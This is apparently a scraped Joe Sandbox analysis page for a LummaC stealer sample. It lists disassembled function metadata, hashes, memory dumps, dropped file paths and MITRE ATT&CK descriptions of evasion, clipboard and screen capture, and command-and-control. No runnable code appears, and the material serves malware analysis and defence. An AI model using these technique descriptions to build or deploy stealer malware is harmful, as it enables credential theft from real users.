Instruction Fuzzy Hash: 49B002A6C4A410969925AA517D029AAB1295A6321AF082076EC0622217BA1AF61E469F

Function 004734B7 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 246COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00473606

Strings

xs, xrefs: 004734FC
pz, xrefs: 0047376E, 004734A8
uw, xrefs: 00473503
pz, xrefs: 004736BA

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: DrivesLogical
String ID: pz$pz$uw$xs
API String ID: 999431828-3977666006
Opcode ID: e173cb9e7862b1f75f76f477a02e0c90c188c3ae8e179152f04abcb7220b91c8
Instruction ID: 9ba8a80e948c675025c23eb73485faf6bbab97e6a11caa3777f03e76be3a9b1c
Opcode Fuzzy Hash: e173cb9e7862b1f75f76f477a02e0c90c188c3ae8e179152f04abcb7220b91c8
Instruction Fuzzy Hash: 1B8112B5D01206CFCB14CF64D891AAABBB0FF1A305B5991A9D449AF322E338D941CFC5

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Cph7VEeu1r.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cph7VEeu1r.exe.log

C:\Users\user\AppData\Local\Temp\LummaC2.exe

C:\Users\user\AppData\Local\Temp\Set-up.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
Cph7VEeu1r.exe

Function 00485135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Function 00458720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Function 0048BAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 0048C59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Function 0048EEC0 Relevance: .1, Instructions: 141
COMMON

Function 0048BC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 0048A080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Function 0048483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Function 00481D10 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 163
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre